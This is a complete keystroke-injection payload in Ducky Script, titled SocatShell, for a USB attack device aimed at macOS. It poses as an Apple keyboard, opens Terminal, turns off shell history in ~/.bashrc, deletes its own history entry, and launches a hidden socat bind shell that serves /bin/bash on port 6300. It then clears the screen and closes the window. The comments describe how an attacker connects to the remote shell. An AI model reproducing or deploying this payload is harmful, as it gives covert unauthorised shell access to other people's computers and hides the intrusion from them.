REM This script sets up a TCP listener using socat for remote shell access. REM Proceeds to clear the terminal and minimize the window for stealth. REM It listens on the specified port (6300) REM Once this script is executed there will be an open listener on port 6300 REM you will be able to use the command 'socat STDIN TCP::6300' REM this will establish a connection to the remote computer on port 6300 REM and you should be able to interact with the remote shell REM Requirement: i.p. of target MacOs and socat application REM can install using homebrew 'brew install socat' REM Title: SocatShell REM Author: NARSTY REM Target: MacOS REM Version: 1.0 REM Category: Recon ID 05ac:021e Apple:Keyboard DELAY 500 GUI SPACE DELAY 500 STRING terminal DELAY 1000 ENTER DELAY 500 STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash DELAY 500 ENTER DELAY 500 STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') DELAY 500 ENTER ENTER DELAY 500 STRING nohup socat TCP-LISTEN:6300 EXEC:/bin/bash &>/dev/null & DELAY 2000 ENTER DELAY 500 STRING clear ENTER DELAY 250 GUI w